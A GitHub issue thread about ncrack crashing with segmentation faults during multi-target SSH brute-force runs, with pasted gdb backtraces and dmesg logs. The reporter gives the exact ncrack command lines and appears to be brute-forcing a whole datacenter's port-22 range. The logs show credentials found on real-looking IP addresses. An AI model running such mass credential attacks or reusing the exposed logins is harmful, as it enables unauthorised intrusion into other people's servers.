emdaitaj commented 7 years ago

hi. every time i try to brute force ssh i get SIGSEGV after a few mins so i tested it with gbd (i have increeced open file limit to 65000 and stack to unlimite) here's the out put

" (gdb) run -p ssh -g cl=200,CL=300,at=4 -U user.txt -P passl.txt -oN out -iL ip Starting program: /usr/local/bin/ncrack -p ssh -g cl=200,CL=300,at=4 -U user.txt -P passl.txt -oN out -iL ip Warning: File ./ncrack-services exists, but Ncrack is using /usr/local/share/ncrack/ncrack-services for security and consistency reasons. Set NCRACKDIR=. to give priority to files in your local directory (may affect the other data files too).

Starting Ncrack 0.6 ( http://ncrack.org ) at 2017-05-07 02:43 PDT

Program received signal SIGPIPE, Broken pipe.

Program received signal SIGPIPE, Broken pipe. Stats: 0:00:42 elapsed; 88 services completed (19132 total) Rate: 0.00; Found: 0; About 0.00% done

Program received signal SIGPIPE, Broken pipe.

Program received signal SIGPIPE, Broken pipe. Stats: 0:00:48 elapsed; 367 services completed (19132 total) Rate: 0.76; Found: 0; About 0.00% done Stats: 0:00:51 elapsed; 368 services completed (19132 total) Rate: 0.47; Found: 0; About 0.01% done

Program received signal SIGPIPE, Broken pipe. Stats: 0:00:53 elapsed; 403 services completed (19132 total) Rate: 88.58; Found: 2; About 0.65% done (press 'p' to list discovered credentials)

Program received signal SIGPIPE, Broken pipe. Stats: 0:00:56 elapsed; 414 services completed (19132 total) Rate: 391.35; Found: 2; About 1.28% done; ETC: 03:58 (1:13:18 remaining) (press 'p' to list discovered credentials) Discovered credentials for ssh on 64.71.168.50 22/tcp: 64.71.168.50 22/tcp ssh: 'root' 'root' Discovered credentials for ssh on 65.19.138.126 22/tcp: 65.19.138.126 22/tcp ssh: 'root' 'root' Stats: 0:01:10 elapsed; 662 services completed (19132 total) Rate: 535.87; Found: 2; About 3.29% done; ETC: 03:19 (0:34:18 remaining) (press 'p' to list discovered credentials) Stats: 0:01:25 elapsed; 836 services completed (19132 total) Rate: 487.81; Found: 6; About 6.08% done; ETC: 03:07 (0:21:54 remaining) (press 'p' to list discovered credentials) Discovered credentials for ssh on 64.71.168.50 22/tcp: 64.71.168.50 22/tcp ssh: 'root' 'root' Discovered credentials for ssh on 65.19.138.126 22/tcp: 65.19.138.126 22/tcp ssh: 'root' 'root' 65.19.138.126 22/tcp ssh: 'user' 'test' 65.19.138.126 22/tcp ssh: 'admin' 'test' 65.19.138.126 22/tcp ssh: 'root' 'test' Discovered credentials for ssh on 72.52.116.58 22/tcp: 72.52.116.58 22/tcp ssh: 'root' 'root' Stats: 0:01:42 elapsed; 842 services completed (19132 total) Rate: 286.98; Found: 10; About 6.69% done; ETC: 03:09 (0:23:58 remaining) (press 'p' to list discovered credentials)

Program received signal SIGPIPE, Broken pipe. Discovered credentials for ssh on 64.71.168.50 22/tcp: 64.71.168.50 22/tcp ssh: 'root' 'root' 64.71.168.50 22/tcp ssh: 'root' 'test' Discovered credentials for ssh on 65.19.138.126 22/tcp: 65.19.138.126 22/tcp ssh: 'root' 'root' 65.19.138.126 22/tcp ssh: 'user' 'test' 65.19.138.126 22/tcp ssh: 'admin' 'test' 65.19.138.126 22/tcp ssh: 'root' 'test' Discovered credentials for ssh on 72.52.116.58 22/tcp: 72.52.116.58 22/tcp ssh: 'root' 'root' 72.52.116.58 22/tcp ssh: 'admin' 'UserPass' 72.52.116.58 22/tcp ssh: 'root' 'UserPass' 72.52.116.58 22/tcp ssh: 'admin' 'PassW0rd' 72.52.116.58 22/tcp ssh: 'user' 'PassW0rd'

Program received signal SIGPIPE, Broken pipe.

Program received signal SIGPIPE, Broken pipe. Stats: 0:01:57 elapsed; 1127 services completed (19132 total) Rate: 373.90; Found: 11; About 7.91% done; ETC: 03:08 (0:22:55 remaining) (press 'p' to list discovered credentials)

Program received signal SIGPIPE, Broken pipe. Stats: 0:02:08 elapsed; 1385 services completed (19132 total) Rate: 529.17; Found: 12; About 9.54% done; ETC: 03:06 (0:20:13 remaining) (press 'p' to list discovered credentials) Discovered credentials for ssh on 64.71.168.50 22/tcp: 64.71.168.50 22/tcp ssh: 'root' 'root' 64.71.168.50 22/tcp ssh: 'root' 'test' Discovered credentials for ssh on 65.19.138.126 22/tcp: 65.19.138.126 22/tcp ssh: 'root' 'root' 65.19.138.126 22/tcp ssh: 'user' 'test' 65.19.138.126 22/tcp ssh: 'admin' 'test' 65.19.138.126 22/tcp ssh: 'root' 'test' Discovered credentials for ssh on 74.82.52.66 22/tcp: 74.82.52.66 22/tcp ssh: 'root' 'root' Discovered credentials for ssh on 72.52.116.58 22/tcp: 72.52.116.58 22/tcp ssh: 'root' 'root' 72.52.116.58 22/tcp ssh: 'admin' 'UserPass' 72.52.116.58 22/tcp ssh: 'root' 'UserPass' 72.52.116.58 22/tcp ssh: 'admin' 'PassW0rd' 72.52.116.58 22/tcp ssh: 'user' 'PassW0rd' Stats: 0:02:19 elapsed; 1453 services completed (19132 total) Rate: 473.54; Found: 12; About 10.63% done; ETC: 03:05 (0:19:28 remaining) (press 'p' to list discovered credentials) Discovered credentials for ssh on 64.71.168.50 22/tcp: 64.71.168.50 22/tcp ssh: 'root' 'root' 64.71.168.50 22/tcp ssh: 'root' 'test' Discovered credentials for ssh on 65.19.138.126 22/tcp: 65.19.138.126 22/tcp ssh: 'root' 'root' 65.19.138.126 22/tcp ssh: 'user' 'test' 65.19.138.126 22/tcp ssh: 'admin' 'test' 65.19.138.126 22/tcp ssh: 'root' 'test' Discovered credentials for ssh on 74.82.52.66 22/tcp: 74.82.52.66 22/tcp ssh: 'root' 'root' Discovered credentials for ssh on 72.52.116.58 22/tcp: 72.52.116.58 22/tcp ssh: 'root' 'root' 72.52.116.58 22/tcp ssh: 'admin' 'UserPass' 72.52.116.58 22/tcp ssh: 'root' 'UserPass' 72.52.116.58 22/tcp ssh: 'admin' 'PassW0rd' 72.52.116.58 22/tcp ssh: 'user' 'PassW0rd' Stats: 0:02:41 elapsed; 1460 services completed (19132 total) Rate: 241.74; Found: 13; About 11.35% done; ETC: 03:07 (0:21:06 remaining) (press 'p' to list discovered credentials)

Program received signal SIGPIPE, Broken pipe.

Program received signal SIGSEGV, Segmentation fault.

---Type to continue, or q to quit---return Program received signal SIGSEGV, Segmentation fault.

Program received signal SIGSEGV, Segmentation fault.

---Type to continue, or q to quit--- Program received signal SIGSEGV, Segmentation fault.

Program received signal SIGSEGV, Segmentation fault.

---Type to continue, or q to quit--- Program received signal SIGSEGV, Segmentation fault.

Program received signal SIGSEGV, Segmentation fault.

---Type to continue, or q to quit--- Program received signal SIGSEGV, Segmentation fault.

Program received signal SIGSEGV, Segmentation fault.

---Type to continue, or q to quit--- Program received signal SIGSEGV, Segmentation fault.

Program received signal SIGSEGV, Segmentation fault.

---Type to continue, or q to quit---return Program received signal SIGSEGV, Segmentation fault.

Program received signal SIGSEGV, Segmentation fault.

---Type to continue, or q to quit--- Program received signal SIGSEGV, Segmentation fault.

Program received signal SIGSEGV, Segmentation fault.

---Type to continue, or q to quit--- Program received signal SIGSEGV, Segmentation fault.

Program received signal SIGSEGV, Segmentation fault.

---Type to continue, or q to quit---return Program received signal SIGSEGV, Segmentation fault.

Program received signal SIGSEGV, Segmentation fault.

---Type to continue, or q to quit---retun Program received signal SIGSEGV, Segmentation fault.

Program received signal SIGSEGV, Segmentation fault.

---Type to continue, or q to quit---q Quit (gdb) where

0 0x0000000000459b14 in ?? ()

1 0x00000000004597cf in ?? ()

2 0x00000000004347df in ?? ()

3 0x0000000000436959 in ?? ()

4 0x00000000004369e6 in ?? ()

5 0x0000000000436c10 in ?? ()

6 0x000000000041c9c9 in ?? ()

7 0x000000000042ce38 in ?? ()

8 0x000000000042a9dc in ?? ()

9 0x000000000042ed19 in ?? ()

10 0x000000000042a463 in ?? ()

11 0x000000000040b783 in ?? ()

12 0x000000000040756b in ?? ()

13 0x000001624a747f45 in __libc_start_main (main=0x407540, argc=13, argv=0x3e31aebf678, init=, fini=,

rtld_fini=<optimized out>, stack_end=0x3e31aebf668) at libc-start.c:287

14 0x0000000000407763 in ?? ()

"

dmesg: grsec: From 2.191.238.207: Segmentation fault occurred at 0000000000000002 in /usr/local/bin/ncrack[ncrack:13542] uid/euid:0/0 gid/egid:0/0, parent /usr/bin/gdb[gdb:12025] uid/euid:0/0 gid/egid:0/0 grsec: From 2.191.238.207: Segmentation fault occurred at 0000000000000002 in /usr/local/bin/ncrack[ncrack:13542] uid/euid:0/0 gid/egid:0/0, parent /usr/bin/gdb[gdb:12025] uid/euid:0/0 gid/egid:0/0 grsec: From 2.191.238.207: Segmentation fault occurred at 0000000000000002 in /usr/local/bin/ncrack[ncrack:13542] uid/euid:0/0 gid/egid:0/0, parent /usr/bin/gdb[gdb:12025] uid/euid:0/0 gid/egid:0/0 grsec: more alerts, logging disabled for 10 seconds

( i had set gdb to not pass SIGSEGV and SIGPIPE)

i tied every possibe opetion ( only -p ssh, -g cl=.., , --conncetion-limit=.., ..) but still get Segmentation fault

os:ubuntu 14.04 amd64 , kernel=3.2.61

thanks for reading

emdaitaj commented 7 years ago

no one helpping???

ithilgore commented 7 years ago

Could you please provide the version of the SSH server (and ideally configuration) you are targeting so I can replicate the crash?

emdaitaj commented 7 years ago

i scanned the ip range of a datacenter for port 22 and it's not a single server and there could be different version ( but most o f them should be ssh2-linux(ubuntu or fedroa or centos)

emdaitaj commented 7 years ago

do you mean that this crash relates to the sshserver that i'm trageting and the problem it's not from the program itself or my kernel or ..

ithilgore commented 7 years ago

The particular SSH server you are targeting might be sending back a reply packet that Ncrack currently doesn't know how to handle (although it should because the code is based on the OpenSSH client which supports all SSH servers out there). Nevertheless, knowing the exact SSH server version will help me replicate the crash and see what's going under the hood there.

emdaitaj commented 7 years ago

ok. i uploaded two core files hope it will help you
http://64.90.63.37/ncrack_core/core http://64.90.63.37/ncrack_core/core2

also this is the output for root@ds9989:/home/ncrack# ncrack -iL nl_adh22.txt --user admin,root --pass Pa$$W0rd,Admin@2017,WildCat.1234 -p ssh

" ssh://88.208.36.210:22 Pool: Removed root Pa24865W0rd ssh://88.208.36.210:22 Pool: Removed root Pa24865W0rd ssh://88.208.36.210:22 (EID 3369) Attempts: total 7 completed 7 supported 3 --- rate 356.43 ssh://88.208.35.139:22 (EID 4521) Initiating new Connection ssh://88.208.39.178:22 (EID 3239) Login failed: 'root' 'Admin@2017' ssh://88.208.39.178:22 last: 0.00 current 0.00 parallelism 10 ssh://88.208.39.178:22 Increasing connection limit to: 13 ssh://88.208.39.178:22 (EID 3239) Attempts: total 5 completed 5 supported 3 --- rate 356.29 ssh://88.208.17.113:22 (EID 4522) Initiating new Connection ssh://88.208.32.233:22 (EID 3265) Login failed: 'root' 'Admin@2017' ssh://88.208.32.233:22 last: 0.00 current 0.00 parallelism 10 ssh://88.208.32.233:22 Increasing connection limit to: 13 ssh://88.208.32.233:22 (EID 3265) Login failed: 'admin' 'WildCat.1234' ssh://88.208.32.233:22 Pool: Append 'admin' 'WildCat.1234' ssh://88.208.32.233:22 (EID 3265) closed on us in the middle of authentication! ssh://88.208.32.233:22 (EID 3265) Connection closed by peer ssh://88.208.32.233:22 (EID 3265) Dropping connection limit due to connection error to: 8 ssh://88.208.32.233:22 (EID 3265) Attempts: total 7 completed 6 supported 3 --- rate 356.68 ssh://88.208.3.73:22 pushed to list PAIRFINI ssh://88.208.7.8:22 Pool: extract 'root' 'Pa24865W0rd' ssh://88.208.7.8:22 (EID 4523) Initiating new Connection ssh://88.208.39.178:22 (EID 3238) Login failed: 'root' 'Pa24865W0rd' ssh://88.208.39.178:22 Pool: Removed root Pa24865W0rd ssh://88.208.39.178:22 (EID 3238) Attempts: total 6 completed 6 supported 3 --- rate 356.86 ssh://88.208.3.80:22 pushed to list PAIRFINI ssh://88.208.17.52:22 pushed to list PAIRFINI ssh://88.208.17.61:22 pushed to list PAIRFINI ssh://88.208.39.86:22 pushed to list PAIRFINI ssh://88.208.16.175:22 pushed to list PAIRFINI ssh://88.208.3.78:22 Pool: extract 'admin' 'WildCat.1234' ssh://88.208.3.78:22 (EID 4524) Initiating new Connection ssh://88.208.36.227:22 (EID 3324) Login failed: 'root' 'Pa24865W0rd' ssh://88.208.36.227:22 Pool: Removed root Pa24865W0rd ssh://88.208.36.227:22 (EID 3324) Attempts: total 8 completed 8 supported 3 --- rate 357.04 ssh://88.208.36.227:22 pushed to list FINISHED ssh://88.208.39.173:22 (EID 3253) Login failed: 'root' 'WildCat.1234' ssh://88.208.39.173:22 (EID 3253) Attempts: total 6 completed 6 supported 3 --- rate 357.23 ssh://88.208.39.173:22 (EID 3251) Login failed: 'root' 'Admin@2017' ssh://88.208.39.173:22 (EID 3251) Attempts: total 7 completed 7 supported 3 --- rate 357.43 ssh://88.208.60.7:22 (EID 3226) Login failed: 'root' 'Pa24865W0rd' ssh://88.208.60.7:22 last: 0.00 current 0.00 parallelism 10 ssh://88.208.60.7:22 Increasing connection limit to: 13 ssh://88.208.60.7:22 Pool: Removed root Pa24865W0rd ssh://88.208.60.7:22 (EID 3226) Attempts: total 5 completed 5 supported 3 --- rate 357.62 ssh://88.208.39.178:22 (EID 3241) Login failed: 'root' 'WildCat.1234'"

also "dmesg: output

"ncrack[32449]: segfault at ffffffffffffffc0 ip 000001ef58a1ea54 sp 000003ef5dcf79c8 error 5 in libc-2.19.so[1ef58996000+1be000] grsec: From 2.191.245.143: Segmentation fault occurred at ffffffffffffffc0 in /usr/local/bin/ncrack[ncrack:32449] uid/euid:0/0 gid/egid:0/0, parent /bin/bash[bash:24865] uid/euid:0/0 gid/egid:0/0 ncrack[32470]: segfault at ffffffffffffffc0 ip 000001c8cc9e8a54 sp 0000038e790497b8 error 5 in libc-2.19.so[1c8cc960000+1be000] grsec: From 2.191.245.143: Segmentation fault occurred at ffffffffffffffc0 in /usr/local/bin/ncrack[ncrack:32470] uid/euid:0/0 gid/egid:0/0, parent /bin/bash[bash:24865] uid/euid:0/0 gid/egid:0/0 ncrack[1224]: segfault at 31 ip 000001f4eaec69ea sp 000003ae58a6f2b8 error 4 in libc-2.19.so[1f4eae3e000+1be000] grsec: From 2.191.245.143: Segmentation fault occurred at 0000000000000031 in /usr/local/bin/ncrack[ncrack:1224] uid/euid:0/0 gid/egid:0/0, parent /bin/bash[bash:24865] uid/euid:0/0 gid/egid:0/0 ncrack[1552]: segfault at 205 ip 0000029ef4b52943 sp 000003d7e2599380 error 4 in libc-2.19.so[29ef4b07000+1be000] grsec: From 2.191.245.143: ncrack[32449]: segfault at ffffffffffffffc0 ip 000001ef58a1ea54 sp 000003ef5dcf79c8 error 5 in libc-2.19.so[1ef58996000+1be000] grsec: From 2.191.245.143: Segmentation fault occurred at ffffffffffffffc0 in /usr/local/bin/ncrack[ncrack:32449] uid/euid:0/0 gid/egid:0/0, parent /bin/bash[bash:24865] uid/euid:0/0 gid/egid:0/0 ncrack[32470]: segfault at ffffffffffffffc0 ip 000001c8cc9e8a54 sp 0000038e790497b8 error 5 in libc-2.19.so[1c8cc960000+1be000] grsec: From 2.191.245.143: Segmentation fault occurred at ffffffffffffffc0 in /usr/local/bin/ncrack[ncrack:32470] uid/euid:0/0 gid/egid:0/0, parent /bin/bash[bash:24865] uid/euid:0/0 gid/egid:0/0 ncrack[1224]: segfault at 31 ip 000001f4eaec69ea sp 000003ae58a6f2b8 error 4 in libc-2.19.so[1f4eae3e000+1be000] grsec: From 2.191.245.143: Segmentation fault occurred at 0000000000000031 in /usr/local/bin/ncrack[ncrack:1224] uid/euid:0/0 gid/egid:0/0, parent /bin/bash[bash:24865] uid/euid:0/0 gid/egid:0/0 ncrack[1552]: segfault at 205 ip 0000029ef4b52943 sp 000003d7e2599380 error 4 in libc-2.19.so[29ef4b07000+1be000] grsec: From 2.191.245.143: Segmentation fault occurred at 0000000000000205 in /usr/local/bin/ncrack[ncrack:1552] uid/euid:0/0 gid/egid:0/0, parent /bin/bash[bash:24865] uid/euid:0/0 gid/egid:0/0 occurred at 0000000000000205 in /usr/local/bin/ncrack[ncrack:1552] uid/euid:0/0 gid/egid:0/0, parent /bin/bash[bash:24865] uid/euid:0/0 gid/egid:0/0"

it've tried sevral time and rarly it whas not recived Segmentation fault ( les than 3 time in 500 time) (with diifren ips)

i've also tried in diffrent machines (all with the same image and kernel(because the datacenter that my didcated server is from provides only that image (also tried to change the kernel and update it but was not seccussfull these machine even don't have any bootloader installed and did everything i could to change the campaney's modified kernel but couldn't (i think maybe the problem is from this kernel) thanks for reading and helping

emdaitaj commented 7 years ago

http://64.90.63.37/ncrack_core/nl_adh22.txt ip list file

emdaitaj commented 7 years ago

ithilgore, cpuld find the problem??

ithilgore commented 7 years ago

I'll take a look during the weekend hopefully. Thanks for the information!

On Fri, May 12, 2017 at 10:12 AM, emdaitaj notifications@github.com wrote:

ithilgore, cpuld find the problem??

— You are receiving this because you commented. Reply to this email directly, view it on GitHub https://github.com/nmap/ncrack/issues/19#issuecomment-301103850, or mute the thread https://github.com/notifications/unsubscribe-auth/AEwyJFqp8K-AyRvGkjNNJIeoEvY-OLKIks5r5HbDgaJpZM4NTFmV .

emdaitaj commented 7 years ago

thanks

emdaitaj commented 7 years ago

I tested on other clean and fresh installed ubuntu 16.04 with last kernel but the same thing happens (all with a 1gbps internet) seems it only happens on multi target mode

ithilgore commented 7 years ago

Interesting. So the bug is triggered only with the -iL switch? How many hosts did you have in there to crack?

emdaitaj commented 7 years ago

i have test on many different number of hosts 200,300,500,1000,2000,5000,10000,30000(not exact number) from different datacenters (mean that the host server are different ) i've tested a few time in olny one host mode and the bruteforce has been completed seccussfully i've noticed most of time the fault happens in lib-c[version].so before ncrack and i think that causes ncrack to get segmentation fault (not alwayes but most of times) i've also tired -cl=200,CL=500,at 10 but made no difference

if you want to see the eroor sonn use 1-3 password and 1-3 user so you'll see it in less than 2 mins

emdaitaj commented 7 years ago

i tested this error does not only happen for ssh . it also happens to rdp protocol so i think the problemn is not from the server but it's from ncrack it self

emdaitaj commented 7 years ago

please add bug lable to this it concerns all moudles

2knarf commented 7 years ago

Anyone found a workaround?

k79e commented 3 years ago

Hi I used the newest version 0.7 and it's fine now.

used 0.8 and it's not work. not very sure whether 0.7 is fine.

k79e commented 3 years ago

Dump file for linux is at #106 I find that large IPlist can trigger it easier.

nmap / ncrack

ncrack segmentation fault( tested on ssh) (only on multi target mode(-iL)) #19

0 0x0000000000459b14 in ?? ()

1 0x00000000004597cf in ?? ()

2 0x00000000004347df in ?? ()

3 0x0000000000436959 in ?? ()

4 0x00000000004369e6 in ?? ()

5 0x0000000000436c10 in ?? ()

6 0x000000000041c9c9 in ?? ()

7 0x000000000042ce38 in ?? ()

8 0x000000000042a9dc in ?? ()

9 0x000000000042ed19 in ?? ()

10 0x000000000042a463 in ?? ()

11 0x000000000040b783 in ?? ()

12 0x000000000040756b in ?? ()

13 0x000001624a747f45 in __libc_start_main (main=0x407540, argc=13, argv=0x3e31aebf678, init=, fini=,

14 0x0000000000407763 in ?? ()